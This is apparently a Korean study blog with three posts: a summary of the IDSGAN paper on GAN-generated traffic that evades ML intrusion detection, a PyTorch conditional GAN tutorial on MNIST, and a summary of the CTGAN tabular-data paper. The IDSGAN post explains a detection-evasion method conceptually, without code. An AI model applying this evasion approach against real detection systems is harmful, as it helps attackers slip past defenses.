최근 IDS(Intrusion Detection System) 들은 얻은 network traffic에서 feature들을 추출한 뒤 ML 모델을 사용하여 탐지하는 방향으로 발전해나가고 있다.

보다 더 정확하고 좋은 성능을 내기 위해서 IDS에 사용되는 ML 모델들도 다양하고 정교화 되어가고 있다.
그러나 이러한 ML을 활용한 IDS들은 adversarial attack에 무방비 상태이다. 따라서 본 논문에서는 IDSGAN이라 불리는 adversarial attack에 대응할 수 있는 프레임워크를 제안하고자 한다. IDSGAN에 사용된 GAN 모델은 보다 안정된 학습과 좋은 성능을 내는 Wasserstein GAN을 사용하게 된다.

Generator는 adversarial malicious traffic records를 생성하게 되고, 이렇게 생성된 records를 바탕으로 black-box IDS 시스템의 취약점을 보완하는 과정이 진행된다.

2. Proposed Method

2.1. Dataset: NSL-KDD dataset description

네트워크 트래픽 record가 담겨있는 NSL-KDD 데이터셋을 사용했으며, 해당 데이터셋에는 9개의 discrete values와 32개의 continuous values로 구성되어있다.
또한 각 record 들은 [그림 1]과 같이 Intrinsic, Content, Time-based traffic, Host-based traffic, Label 로 구성되어있다.

[그림 1] structure of record

2.2. Data preprocessing

모델에 데이터를 먹이기 전에, category 데이터의 numeric conversion이나 normalization 등의 전처리 과정이 필요하다.
9가지 discrete feature중, 3개는 non-numeric value이고 나머지 6개는 0 or 1의 binary value이다.

non-numeric value (예를들어 TCP / UDP / ICMP) 들은 numeric value로 변환해주는 one-hot encoding 과정을 거친다.
input 벡터의 feature 값의 dimensional impact를 줄여주기 위해서 전체적인 scalar 값들을 noramlization해주는 과정이 필요하다.

따라서 전체 numeric한 discrete / continuous features에 대하여 Min-Max normalization을 진행해주었다.

2.3. Structure of IDSGAN

IDSGAN 프레임워크의 전체 구조는 [그림 2]와 같다.

[그림 2] structure of IDSGAN

GAN 모델의 non-convergence와 instability 를 극복하기 위해, IDSGAN에서는 이를 해결할 수 있는 Wasserstein GAN을 적용하였다.

또한 본 논문에서는 Probe, Dos, U2R, R2L 공격기법에 대하여 각각 functional features를 [그림 3]과 같이 설정하였다. functional feature는 각 공격 카테고리에서 adversarial examples를 만들어낸다고 하더라도 바뀌지 않아야 할 feature 값이다.

[그림 3] functional feature of attack category

이제 본격적으로 Generator를 살펴보자.

original example을 adversarial example로 변환하기 위해서, Generator는 Malicious traffic record와 noise를 input으로 받아 Adversarial malicious traffic records를 output으로 뽑아내게 된다.

Generator는 총 5개의 linear layers로 구성되어 있으며, activation function으로는 ReLU 함수가 이용되었다. 추가적으로 앞서 전처리 과정에서 0~1 사이 값으로 normalization 해주었기 때문에, 생성 결과값이 0보다 작거나 1보다 큰경우 각각 0과 1로 처리해주었다.

또한 functional feature가 아닌 discrete features들은 모두 값이 0 or 1이기 때문에 0.5를 threshold 로 잡고, threshold보다 크면 1, 작으면 0으로 바꿔주는 일종의 트릭을 적용해주었다.

다음으로 Discriminator를 살펴보자. Discriminator의 목표는 black-box IDS를 최대한으로 흉내내는 것이라고 할 수 있다.
우선 Generator가 생성한 Adversarial malicious traffic record와 실제 데이터셋의 Normal traffic record를 black-box IDS에 넣어 결과로 나온 output 값을 해당 record의 label로 설정한다.

이제 discriminator가 black-box IDS를 흉내내기 위해, Adversarial malicious traffic records와 Normal traffic records를 이번에는 Discriminator에 Input으로 넣어주고, 앞서 black-box IDS에서 나온 record의 label을 함께 Discriminator에 넣어줌으로써 Discriminator를 학습하게 된다.

이렇게 학습이 되는 과정에서 Discriminator의 loss에 따라 Discriminator와 Generator의 parameter가 조정될 것이고, 이를 통해 Generator는 보다 정교하고 그럴듯한 데이터를 생성해낼 수 있게 되고, Discriminator는 black-box IDS 와 더 비슷해져갈 것이다.

다음으로 Training 알고리즘을 살펴보도록 하자. 논문 상에는 정확하게 나와있지 않지만, loss function을 보고 추론해본 결과 malicious record는 1로, benign record는 0으로 labeling 한 듯 하다.

우선 Generator의 loss function은 [그림 4]와 같다.
Generator의 목적은 최대한 black-box IDS가 malcious record를 benign record로 착각하도록 만드는 것이고, Discriminator가 IDS를 흉내내고 있으므로, 결국 Discriminator가 malicious record를 benign record로 착각하도록 만드는 것이다.

[그림 4] Loss function of Generator

따라서 [그림 4]처럼 D(G(M, N))의 기댓값이 최대한 작아지는방향 (=Discriminator의 결과가 0인 방향 = Dicriminator가 benign으로 판단하는 방향)으로 학습이 진행되어야 한다.

다음으로 Discriminator의 loss function은 [그림 5]와 같다.
Discriminator의 목적은 최대한 black-box IDS를 흉내내는 것이고, IDS는 benign / malicious record를 올바르게 판단하는 것이기 때문에, 결국 Discriminator가 benign(normal) record에 대해서는 0으로, malicious(attack) record에 대해서는 1로 판단하는 방향으로 학습이 진행되어야 한다.

이럴 경우 [그림 5]의 loss function이 최소화 되는 방향으로 학습되어진다.

[그림 5] Loss function of Discriminator

Wassersteing GAN에 의해 optimizer로는 RMSProp가 사용되었다. 전체적인 IDSGAN의 알고리즘은 [그림 6]과 같다.

[그림 6] Algorithm of IDSGAN

3. Experiments and Results

실험을 위해 7가지 ML 모델 (SVM, NB, MLP, LR, DT, RF, KNN)을 IDS 로 구현하였으며, GAN에는 noise vector 로 9 dimension을 사용하였다.

IDSGAN을 평가하기 위한 metric으로는

1) detection rate (DR; malicious traffic을 얼마나 정확히 탐지하는가)

2) evasion increase rate (EIR; 원래는 malicious 하지만, generator를 통해 adversarial example로 생성되어 benign으로 오탐지된 비율 = adversarial attack이 얼마나 성공적인가)

두가지 metric을 사용하게 된다. 해당 metric의 수식은 [그림 7]과 같다.

[그림 7] DR & EIR metric

3.1. Measurement of IDSGAN in different attacks

detection rate의 관점에서, 실험을 진행한 결과, [그림 8]의 (a) 에서 볼 수 있듯이, Dos 공격 카테고리의 경우 원래는 DR이 80% 언저리로 높게 나오던 지표가 IDSGAN을 통해 생성된 adversarial examples에 대해서는 거의 0에 수렴하는 정확도를 보이고 있다.

이는 모든 ML 모델에 상관없이 공통적으로 발생하였다. (b) 에서 역시 볼 수 있듯이, U2R / R2L 공격 카테고리의 경우에도 원래 DR에 비해 adversarial examples의 DR은 모두 0에 수렴하는 것을 확인할 수 있다.

[그림 8]  DR result

3.2. Measurement of IDSGAN with different amounts of modified features

각 ML 모델에 대하여 unmodified 된 nonfunctional feature를 추가할 경우, 즉 처음 생성된 adversarial attack record에 비해 덜 바꿀 경우, EIR 의 변화는 [그림 9]과 같다.

[그림 9] EIR result

전체적으로 original record에 비해 덜 바꿀 경우 EIR은 줄어들지만 여전히 98% 이상의 높은 EIR 를 유지하는 것을 확인할 수 있다. 이는 IDSGAN의 robustness를 잘 보여주는 결과이다.

4. Conclusions

IDS를 우회하는 adversarial attacks를 생성하기 위해 IDSGAN이라는 Wassersteing GAN 기반의 새로운 프레임워크를 제안하였다. IDSGAN은 generator, discriminator과 black-box IDS로 구성되어있으며, 실험 결과 생성된 adversarial examples들은 기존의 IDS 시스템을 거의 100% bypass 하는 것을 확인할 수 있었다.

또한 기존의 record에서 크게 많은 것을 바꾸지 않더라도 EIR이 어느 정도 유지되는 것을 통해 IDSGAN의 robustness를 잘 보여주었다.

5. 마무리

GAN을 이용해 blax-box 형태의 IDS, 즉 detection system을 우회할 수 있는 데이터를 생성할 수 있다는 점이 인상깊었다. 특히 기존의 GAN 모델과 다르게 labeling을 IDS system 을 통해 함으로써 Discriminator를 최대한 IDS를 모방하는 방향으로 학습시켜 해당 IDS를 우회할 수 있도록 한 아이디어가 독특했다.

좀 찾아보니 향후에 이런 시스템을 사용하는 연구들이 많이 나왔던데, 그러한 연구들의 토대가 되었다는 점에서 의미가 크다고 생각이 든다.

Reference

Lin, Zilong, Yong Shi, and Zhi Xue. "Idsgan: Generative adversarial networks for attack generation against intrusion detection." arXiv preprint arXiv:1809.02077 (2018).

[Pytorch] Conditional GAN 구현 및 학습 (CGAN)

dong1 — Sat, 19 Mar 2022 05:32:18 +0900

1. 개요

https://github.com/godeastone/GAN-torch

Pytorch 로 구현한 CGAN 전체 코드는 위 git repository에서 확인할 수 있다.

2. Conditional GAN

Conditional GAN (CGAN)은 GAN이 처음 제안된 연도인 2014년 Mehdi Mirza, Simon Osindero 에 의해 제안된 GAN 의 변종 알고리즘이다.

아래 링크에서 논문 확인이 가능하다.

https://arxiv.org/abs/1411.1784

Conditional Generative Adversarial Nets

Generative Adversarial Nets [8] were recently introduced as a novel way to train generative models. In this work we introduce the conditional version of generative adversarial nets, which can be constructed by simply feeding the data, y, we wish to conditi

arxiv.org

Conditional GAN의 목적은 분명하다. Condition 이라는 조건을 나타내는 변수를 추가함으로써 데이터 생성을 '내 입맛대로' 할 수 있도록 한 것이다.

Conditional GAN은 [그림 1]과 같이 기존의 GAN 모델에서 단 하나, y 라는 condition 값이 추가되었다. 이 y 값은 Generator와 Discriminator의 Input값에 들어갈 때, 단순히 이어붙여주면 된다. (매우 간단)

[그림 1] Condtional GAN 구조

예를 들어 MNIST 데이터셋을 GAN모델으로 학습하고 생성한다고 생각해보자.

어느정도 Generator 가 생성되었을 때, 하나의 데이터를 샘플링해보면 그 데이터 샘플은 분명 그럴듯한 숫자 모양을 하고 있을 것이다.

하지만, 그 숫자가 무슨 label에 해당하는 숫자인지는 까보기 전까지 구현한 사람도, 샘플링한 사람도 알지 못한다.

하지만 Condtional gan을 통해 이러한 문제를 해결할 수 있다.

학습 과정에서 숫자 0에 해당하는 데이터를 학습시킬때 latent 벡터 z 옆에 condition 변수 [1, 0, 0, 0, 0, 0, 0, 0, 0, 0] 를 이어붙여줘보자. (MNIST는 숫자이므로 총 10개의 label이 있고 이를 one-hot encoding 하여 벡터로 나타내주었다.)

또한, Generator를 통해 학습시킨 값 G(z)를 Discriminator에 넣어줄때도 동일하게 condition 변수 [1, 0, ..., 0] 을 이어붙여준채로 학습을 시켜보자.

마찬가지로 만약 2라는 데이터를 학습시킬때는 z 벡터와 G(z) 값 뒤에 condition 변수 [0, 0, 1, 0, 0, 0, 0, 0, 0, 0] 를 붙여주면 된다.

이렇게 학습시킬 경우, 나중에 학습 과정이 끝나고 샘플링 할때 G(z)에서 z 뒤에 자신이 원하는 label에 해당하는 condition 변수를 이어붙여준다면, 자신이 원하는 label에 해당하는 샘플을 얻어낼 수 있다.

즉 한마디로 정리해보면, GAN 학습과정에서 y라는 condition 변수를 추가함으로써 자신이 원하는 label의 데이터를 생산해낼 수 있도록 만든 GAN 모델. 이라고 보면 된다.

이렇게 단순해서인지 Conditional GAN의 loss 함수도 [그림 2] 에서 볼 수 있듯이 그냥 GAN 함수에 비해 단지 y 를 조건부 확률로 추가해준 것 밖에는 없다.

[그림 2] Conditional GAN loss function

이외에도 논문을 보면, image 데이터를 CNN 연산하여 나온 fc layer를 condition으로 주고, 해당 사진을 설명하는 tag를 생성해낼 수 있는 모델도 확인해볼 수 있으니, 직접 논문을 읽어보는 것을 권장한다.

3. 구현

그럼 이제 CGAN을 어떻게 구현할 수 있을지 코드를 보며 이해해보자.

class Discriminator(nn.Module):
    def __init__(self):
        super(Discriminator, self).__init__()

        self.linear1 = nn.Linear(img_size + condition_size, hidden_size3)
        self.linear2 = nn.Linear(hidden_size3, hidden_size2)
        self.linear3 = nn.Linear(hidden_size2, hidden_size1)
        self.linear4 = nn.Linear(hidden_size1, 1)
        self.leaky_relu = nn.LeakyReLU(0.2)
        self.sigmoid = nn.Sigmoid()

    def forward(self, x):
        x = self.leaky_relu(self.linear1(x))
        x = self.leaky_relu(self.linear2(x))
        x = self.leaky_relu(self.linear3(x))
        x = self.linear4(x)
        x = self.sigmoid(x)
        return x

우선 Discriminator는 위와 같이 정의할 수 있다. 일반적인 multi layer neural network로 구성되어 있다.

총 4개의 Linear layer로 구성되어 있는데, 첫번째 layer에서는 MNIST 이미지 사이즈 (1 x 28 x 28 = 784)에 condition 변수의 크기 (condition_size)를 더한 값을 입력받고, 마지막 레이어에서는 classification을 위해 1개의 노드로 정리된다.

각 레이어 사이에는 activation function으로 leaky ReLU 함수가 사용되었으며, 마지막에는 확률로 표현하기 위해 sigmoid 함수가 사용되었다.

GAN과 다른점은 Input의 크기가 condition 변수의 크기만큼 더해졌다는 것밖에 없다.

class Generator(nn.Module):
    def __init__(self):
        super(Generator, self).__init__()

        self.linear1 = nn.Linear(noise_size + condition_size, hidden_size1)
        self.linear2 = nn.Linear(hidden_size1, hidden_size2)
        self.linear3 = nn.Linear(hidden_size2, hidden_size3)
        self.linear4 = nn.Linear(hidden_size3, img_size)
        self.relu = nn.ReLU()
        self.tanh = nn.Tanh()

    def forward(self, x):
        x = self.relu(self.linear1(x))
        x = self.relu(self.linear2(x))
        x = self.relu(self.linear3(x))
        x = self.linear4(x)
        x = self.tanh(x)
        return x

Generator는 Discriminator와 반대로 구성되어 있다.

역시 총 4개의 Linear layer로 구성되어 있으며, 입력값으로 noise vector 'z'의 크기에 condition 변수의 크기 (condition_size)를 더한 Input 값이 들어가고, 마지막 layer에서는 실제 MNIST 데이터의 크기 (1 x 28 x 28 = 784) 개의 노드로 정리된다.

각 layer 사이에는 activation function으로 ReLU 함수가 사용되었으며, 마지막 layer 에는 tanh 함수가 사용되었다.

Gnenrator 역시 GAN과 다른점은 Input의 크기가 condition 변수의 크기만큼 더해졌다는 것밖에 없다.

나머지 학습 과정은 GAN과 진짜 똑같다.

criterion = nn.BCELoss()
d_optimizer = torch.optim.Adam(discriminator.parameters(), lr=learning_rate)
g_optimizer = torch.optim.Adam(generator.parameters(), lr=learning_rate)

GAN과 마찬가지로 학습에는 BCELoss를 사용하였으며, Adam optimizer를 사용하였다.

GAN 에서도 강조했듯이, genrator와 discriminator는 서로 따로따로 학습되므로 각각 optimizer를 구분지어 정의해주어야 한다.

for epoch in range(num_epoch):
    for i, (images, label) in enumerate(data_loader):

        # 라벨을 만들어 줍니다. 1 for real, 0 for fake
        real_label = 
        	torch.full((batch_size, 1), 1, dtype=torch.float32).to(device)
        fake_label = 
        	torch.full((batch_size, 1), 0, dtype=torch.float32).to(device)

        # MNIST dataset의 데이터를 flatten 하게 reshape 해줍니다.
        real_images = images.reshape(batch_size, -1).to(device)

이제 for문을 통해 각 epoch 마다 학습을 시켜주게 된다.

학습을 위해 [batch size, 1] 크기의 모두 1로 구성된 real label 의 tensor와 모두 0으로 구성된 fake label의 tensor를 만들어 주었다.

	# +---------------------+
        # |   train Generator   |
        # +---------------------+

        # Initialize grad
        g_optimizer.zero_grad()
        d_optimizer.zero_grad()

        # fake image를 generator와 noize vector 'z' 를 통해 만들어주기
        z = torch.randn(batch_size, noise_size).to(device)

        # 노이즈 벡터 z 와 encoded labels을 합쳐준다. (concate)
        z_concat = torch.cat((z, label_encoded), 1)
        fake_images = generator(z_concat)
        fake_images_concat = torch.cat((fake_images, label_encoded), 1)

        # loss function에 fake image와 real label을 넘겨주기
        # 만약 generator가 discriminator를 속이면, g_loss가 줄어든다.
        g_loss = criterion(discriminator(fake_images_concat), real_label)

        # backpropagation를 통해 generator 학습
        g_loss.backward()
        g_optimizer.step()

우선 Generator를 학습시켜주자. Discriminator 를 먼저 학습시키든 Generator를 먼저 학습시키든 상관없지만, 중요한 것은 각자 따로따로 학습시켜줘야 한다는 점이다.

우선 noise vector 'z' 를 torch.randn 함수를 통해 랜덤한 값으로 채워준다.

[13번째 줄] 여기서 CGAN만의 특징이 나타나는데, 앞서 [그림 1]에서 보았던 구조처럼 noise vector 'z'에 label 값을 인코딩한 벡터(y) 를 합쳐줘야 한다.

[15번째 줄] 또한, Discriminator 의 Input에도 contion 변수가 합쳐져야 하므로, 생성된 fake image, G(z+y) 값에도 label 값을 인코딩한 벡터 (y)를 합쳐준다.

이제 앞서 선언한 generator에 (z+y) 를 넣어줌으로써 [28 x 28 = 784] 크기의 이미지 데이터를 생성하게 된다. 즉 G(z+y)는 Generator가 생성한 batch size 개수만큼의 이미지가 된다.

앞서 2장에서 설명했듯이 Generator는 D(G(z+y))의 성능을 낮추는 방향으로 학습된다.

따라서 loss 함수에 D(G(z+y))와 real label을 함께 넣어준다.

이렇게 할 경우, Discriminator가 제대로 판단을 할 경우(fake라 판단) Generator는 올바른 방향으로 데이터를 생성하지 못했다고 생각하게 되고, Discriminator 가 제대로 판단하지 못할 경우(real로 판단) Generator는 올바른 방향으로 데이터를 생성했다고 생각하게 된다.

이런 과정을 통해 Generator의 성능이 높아지는 방향으로 학습이 진행되게 된다.

        # +---------------------+
        # | train Discriminator |
        # +---------------------+

        # Initialize grad
        d_optimizer.zero_grad()
        g_optimizer.zero_grad()

        # fake image를 generator와 noize vector 'z' 를 통해 만들어주기
        z = torch.randn(batch_size, noise_size).to(device)

        # 노이즈 벡터 z 에 encoded label를 합쳐준다.
        z_concat = torch.cat((z, label_encoded), 1)
        fake_images = generator(z_concat)
        fake_images_concat = torch.cat((fake_images, label_encoded), 1)

        # fake image와 fake label, real image와 real label을 넘겨 loss 계산
        fake_loss = criterion(discriminator(fake_images_concat), fake_label)
        real_loss = criterion(discriminator(real_images_concat), real_label)
        d_loss = (fake_loss + real_loss) / 2

        # backpropagation을 통해 discriminator 학습
        # 이 부분에서는 generator는 학습시키지 않음
        d_loss.backward()
        d_optimizer.step()

다음으로 Discriminator를 학습시켜주자.

우선 앞서 했던것과 같이 (z+y) 값을 generator에 통과시켜 fake image를 만들어준다.

fake image에 역시 condition 변수 y를 합쳐 G(z+y) + y를 만들어준다.

D(G(z+y) + y) 값을 loss function에 fake label과 함께 넣어 fake loss를 구해주고, D(x) 값을 loss function에 real label과 함게 넣어 real loss를 구해준다.

이렇게 구한 두 fake / real loss를 평균내서 전체 discriminator 의 loss값을 구해준다.

이렇게 하면 Discriminator가 제대로 fake 와 real 이미지를 판단할 수 있는 방향으로 학습이 진행되게 된다.

이제 conditional GAN의 꽃이라 불릴 수 있는 '내가 원하는 label의 데이터를 샘플링' 하는 것을 해보자.

# CGAN's 의 validity를 테스트해볼 수 있는 함수
def check_condition(_generator):
    test_image = torch.empty(0).to(device)

    for i in range(10):
        test_label = torch.tensor([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
        test_label_encoded = F.one_hot(test_label, num_classes=10).to(device)

        # create noise(latent vector) 'z'
        _z = torch.randn(10, noise_size).to(device)
        _z_concat = torch.cat((_z, test_label_encoded), 1)

        test_image = torch.cat((test_image, _generator(_z_concat)), 0)

    _result = test_image.reshape(100, 1, 28, 28)
    save_image(_result, os.path.join(dir_name, 'CGAN_test_result.png'), nrow=10)

CGAN이 제대로 동작하는지는 check_condition 이라는 함수를 통해 구현했다.

학습된 generator를 parameter로 받아온 check_condition 함수는 test_label_encoded라는 [10 x 10]의 matrix를 만들어낸다.

test_label_encoded 는 각 열마다 0, 1, 2, ..., 9에 해당하는 encoded vector가 담겨있다. 한번 나타내보면 아래와 같다.

[1, 0, 0, 0, 0, 0, 0, 0, 0, 0]

[0, 1, 0, 0, 0, 0, 0, 0, 0, 0]

[0, 0, 1, 0, 0, 0, 0, 0, 0, 0]

[0, 0, 0, 1, 0, 0, 0, 0, 0, 0]

. . .

[0, 0, 0, 0, 0, 0, 0, 0, 1, 0]

[0, 0, 0, 0, 0, 0, 0, 0, 0, 1]

이제 noise vector 'z' 10행을 만들어내고, 거기에 test_label_encoded matrix를 이어준 _z_concat 값을 만들어준다. 이어붙이면 [10 x 20] 의 크기가될 것이다.

generator에 _z_concat을 넣어주면, 샘플링한 이미지가 나타나게 될 것이다.

차례로 0, 1, 2, ..., 9에 해당하는 label vector를 붙여줬으므로, 실제 샘플링한 값도 이에 맞게 나올 것이다.

실제 코드를 돌려 GAN을 학습한 뒤, check_condition을 통해 확인한 결과는 [그림 3]과 같다.

[그림 3] CGAN 학습 결과

실제로 내가 원하는 condition대로 잘 학습된 것을 확인할 수 있다. (대체로 2랑 5를 조금 잘 못만들어내는 듯,,)

만약 기본 GAN을 통해 학습시켰다면, [그림 3]에 무작위의 숫자들이 들어갔을 것이다.

위 내용은 공부하며 정리한 것으로, 오류가 있을 수 있습니다.

[논문] Modeling Tabular Data using Conditional GAN

dong1 — Sun, 13 Mar 2022 17:41:13 +0900

논문 제목 : Modeling Tabular Data using Conditional GAN

0. abstract

continuous 와 discrete data가 같이 있는 tabular data를 GAN과 같은 생성 모델을 통해 생성하는 것은 쉬운 일이 아니다. 본 논문에서는 CTGAN이라 불리는 모델의 conditional generator를 통해 이러한 문제를 해결하였으며, 생성모델의 성능을 측정하기 위한 benchmark 시스템 또한 제안하였다.

1. Introduction

최근 deep generative models들이 활발히 연구되면서 확률 분포를 보다 정교하고 정확하게 배움으로써 좋은 성능의 생성 모델들이 나오고 있다.

이런 상황 속에서 이러한 생성모델을 정확하게 evaluation 할 수 있는 benchmarking 방식 또한 중요하게 대두되고 있다.
하지만 tabular data GAN의 경우에 likelihodd fitness 나 machine learning efficacy 등의 metric 에서 좋지 않은 성능을 보여주고 있다.

이러한 한계점은 tabular data 에서 discrete와 continuous한 columns을 학습시킬 때, 다양한 문제들이 발생하기 때문이다. continuous data의 경우 확률 분포가 여러개의 봉우리를 가지게 되는 multi-modal distribution을 가지며, discrete data의 경우 category별로 빈도수가 모두 다르다는 성질(imbalance) 이 존재한다.

이러한 문제점들을 극복하기 위해 본 연구에서는 conditional tabular GAN(CTGAN) 을 제안한다. 즉 mode-specific 하게 데이터를 생성해내는 것이다.

CTGAN을 적용해 테스트해본 결과, 다른 bayesian network나 GAN에 비해 좋은 성능을 내는 것을 확인할 수 있었다.
본 논문의 contributions는 크게 두가지가 있는데, 각각 1) CTGAN을 통해 tabular data를 보다 좋은 성능으로 생성할 수 있는 방법 제안하였으며 2) 데이터 생성 알고리즘에서의 성능을 평가할 수 있는 단일화된 benchmarking 시스템을 제안한다.

2. Related work

이전까지 tabular 데이터에 대한 생성 모델은 데이터의 type에 따라서 제한된다는 한계가 존재했다. 그럼에도 불구하고 의료 데이터에 tabular GAN이 자주 이용되기도 하였다.

3. Challenges with GANs in Tabular Data Generation Task

Tabular data를 생성할때는 Generator G가 기존의 table T을 기반으로 Tsync를 생성하게 된다. T는 Nc개의 continous columns를 가지게 되며, Nd개의 discrete column을 가진다. 각각의 columns들은 random variable로써 joint distribution을 가지게 된다.

이렇게 생성된 Tsync는 크게 두가지 metric으로 평가되게 된다.

1) Likelihodd fitness : Tsync에 있는 columns들이 Ttrain에 있는 columns의 joint distribution을 잘 따르는가?
2) Machine learning efficacy : Ttrain을 통해 만들어진 Tsync를 통해 학습한 ML 모델의 성능과, 실제 데이터인 Ttest를 통해 학습한 ML 모델의 성능이 얼마나 비슷한지?

이러한 metric이 좋은 성능을 내기 위해서는 tabular data에의 Mixed data types(discrete & continuous columns), Non-Gaussian distributions(continuous data의 경우), Multimodal distributions(확률분포가 여러 봉우리 가짐), Learning from sparse one-hot-encoded vectors, Highly imbalanced categorical columns (mode collapse 발생) 등의 문제를 해결해야 한다.

4. CTGAN Model

앞서 설명했듯이 CTGAN에서는 mode-specific normalization이 적용되는데, 이는 데이터의 non-Gaussian 과 multimodal distribution 문제를 해결해준다.

또한 conditional generator와 training-by-sampling이 적용되는데, 이는 imbalanced discrete columns 문제를 해결해준다.

4.1. Notations

notation

4.2. Mode-specific Normalization

tabular 데이터를 생성하기 전에 Normalization 과정을 거쳐줘야 한다.
우선 discrete 변수는 단순히 전체 category 개수만큼의 비트로 one-hot encoding을 진행해주면 된다.

문제는 continuous 변수인데,, 일단 continuous 변수를 가지는 하나의 column이 있다고 생각해보자. 해당 column에 속한 데이터들의 확률분포는 [그림 1]과 같이 여러개의 봉우리(?) 가 있는 모양으로 표현되는 경우가 많다. 이를 Gaussian mixture라고 부른다.

[그림 1] Gaussian mixture

이럴 경우 제대로 데이터를 생성하기 어렵기 때문에 normalization 과정을 거쳐야 한다. 우선 gaussian mixture에서 봉우리 개수만큼의 gaussian 확률 분포를 따르는 여러개의 sub distribution으로 나눠줘야 한다. 이 과정에서 Gaussian mixture model (VGM)이 사용된다.

[그림 2] mode-specific normalization example

[그림 2]는 해당 논문에서 model-specific normalization의 예시로 든 사진인데, 해당 예시에서는 총 3개의 sub distribution, 즉 3개의 mode가 존재함을 알 수 있다.

우선 VGM을 통해 sub distribution으로 나눠주고, 이 각각의 sub distribution의 분산과 weight 를 미리 구해두자.
다음으로 i번째 column에 해당하는 데이터인 C(i,j)를 확률밀도함수에 찍어보고, 가장 확률이 높게 나오는 sub distribution을 구해준다.

[그림 2]에서는 3번째 mode에서의 확률이 가장 높게 나오므로, 이를 표현하기 위해 one-hot encoding으로 [0, 0, 1]으로 표현해주었다. 또한 해당 sub distribution의 평균과 표준편차를 통해 scalar로 표현된 가중치값인 알파값 또한 구할 수 있다.

이제 구한 값들을 가지고 [그림 3]과 같이 각 row들을 normalization 해주면 된다.

[그림 3] row normalization

여기서 d(1,j) 이전의 부분들은 continuous columns 들이고, [그림 2]의 과정을 거쳐 mode-specific 하게 구했다. d(1,j) 이후의 부분들은 discrete columns 들이고 간단히 one-hot encoding 하여 구해주었다.

4.3. Conditional Generator and Training-by-Sampling

이제 normalization 도 마쳤겠다, 본격적으로 GAN 학습을 해볼 것이다.

하지만 몇가지 문제가 있다. Discrete 변수의 경우, 각 category마다 빈도가 다르다.
예를 들어 '색깔'이라는 column은 discrete 변수이다.

실제 table T에서 '색깔' column에 해당하는 row들을 쭉 살펴본 결과 '빨강'에 해당하는 row가 전체 row의 80%를 차지하고 '파랑' 에 해당하는 row가 나머지 20%를 차지한다고 가정해보자.

만약 GAN을 학습시킬때 이러한 빈도를 신경쓰지 않고 학습시키게 되면, 원래 데이터의 특징이 사라지게 된다. 이를 해결하기 위해 'Training-by-sampling' 이라는 개념을 도입하였다.

Training-by-sampling은 다음과 같이 진행된다.

1) 우선 N_d 개의 discrete columns 중에 랜덤으로 하나를 선택한다. 이를 i* 라 표현한다.
2) 위에서 선택된 column에 대해 PMF(확률 질량 함수)를 구한다.
3) PMF를 따르는 확률 분포에 따라 값 하나를 선택한다. 이를 k* 번째 값이라 표현한다.
4) 이제 Conditional vector를 i*와 k* 값을 고려하여 생성해준다.

[그림 4]는 본 논문에서 CTGAN의 전체 과정을 나타낸 그림이다.

[그림 4]의 예시에서는 discrete column 중 2번째 column이 선택되었으므로 i*의 값은 2다. 또한 2번째 column중 1번째 value가 선택되었으므로 k*의 값은 1이다.
따라서 [00010]으로 표현되는 conditional vector를 생성할 수 있게 된다.

[그림 4] CTGAN model structure

이렇게 taining-by-sampling 을 통해 학습을 진행할 경우, discrete column에 대하여 각 category 별로 기존 데이터의 빈도와 비슷하게 학습이된다.

4.4. Network Structure

앞서 말한 내용들을 모두 정리하여 만든 generator 의 구조는 [그림 5]와 같다.

latent vector 에서 시작하여 2개의 hidden layer를 거치고 난 뒤, 알파, 베타, d 의 값을 구하게 된다.

알파값은 scalar 값이므로 activation 함수로 tanh 를 사용하였고, 베타와 d는 벡터 형식의 데이터이므로 다중 class 에 대한 classification이 가능한 gumbel sofmax 함수를 사용하였다.

학습에 사용된 loss는 Generator loss로, one-hot encoding된 벡터 m과 d 사이의 cross-entropy loss를 사용하게 된다.

[그림 5] Generator of CTGAN

또한 discriminator (여기에서는 critic) 의 구조는 [그림 6]과 같다.

discriminator는 mode collapse를 막기 위해 10개의 sample이 한번에 들어가게 되며, 10개의 conditional vector도 함께 들어가게 된다. (PacGAN 구조 사용)

결국 마지막 레이어에서는 1개의 노드만이 남게 되며 real 데이터라면 1, fake 데이터라면 0으로 예측하게 된다. 학습에는 WGAN loss가 사용되며 optimizer로는 Adam이 사용된다.

[그림 6] Discriminator of CTGAN

4.5. TVAE Model

GAN 뿐 아니라 VAE에도 해당 방식을 적용할 수 있다. 구조는 [그림 7]과 같다.
나머지는 모두 전체적인 구조는 거의 모두 같고, cross entropy를 사용했던 generator loss와 다르게 ELBO loss를 사용했다.

[그림 7] TVAE generator

5. Benchmarking Synthetic Data Generation Algorithms

5.1. baselines and Datasets

본 논문에서 제안하는 데이터 생성 알고리즘에 대한 benchmark 시스템에서 기반으로 사용되는 baselines는 Bayesian networks(CLBN, privBN)와 딥러닝을 사용한 synthetic data generation (MedGAN, VeeGAN, TableGAN) 등이 있다.

본 benchmark에 사용되는 데이터셋은 크게 두가지로 분류할 수 있다.

1) Simulated data
실제 데이터로부터 오라클 S를 통해 simulate된 데이터이다. Gausian mixture 모델을 사용해 simulate한 Grid, Ring과 Bayesian network 모델을 사용해 simulate한 alarm, child, asia, insurance 데이터셋이 있다.
이렇게 simulate한 데이터셋의 경우 실제 해당 데이터셋의 실제 분포를 정확하게 알 수 있다는 특징이 존재한다.

2) Real data
실제로 존재하는 데이터셋도 사용하였다. UCI ML repository에서 6개의 자주 사용되는 데이터셋을 선정하였으며, MNIST 데이터셋을 기반으로 MNIST28, MNIST12 데이터셋도 선정하였다.

5.2. Evaluation Metrics and Framework

이제 본 논문에서 제안하는 두가지 metric 을 하나씩 살펴보자.

Likelihood fitness metric

Likelihood fitness metric 에서는 앞서 설명한 두가지 데이터셋 타입 중, Simulated data를 사용하게 된다.
[그림 8]은 Likelihood fitness metric를 구하는데 사용된 framework를 나타낸 것이다.

[그림 8] Likelihood fitness metric

우선 Simulated된 데이터를 Train 과 Test로 나누고, Test 데이터를 생성모델을 통해 synthesize한다. 이 Synthetic data와 기존에 Simulated 된 데이터 사이의 유사도 likelihood를 구하면 L(sync) 가 나오게 된다.
하지만 L(sync)는 생성 모델이 overfitting될수록 잘 나오기 때문에, 이를 피하기 위해 Test데이터와 synthesize 데이터 사이의 likelihood를 구한 L(test)도 사용하게 된다.

Machine learning efficacy

Machine learning efficacy 에서는 앞서 설명한 두가지 데이터셋 타입 중, Real data를 사용하게 된다.
[그림 9]는 Machine learning efficacy를 구하는데 사용된 framework를 나타낸 것이다.

[그림 9] Machine learning efficacy

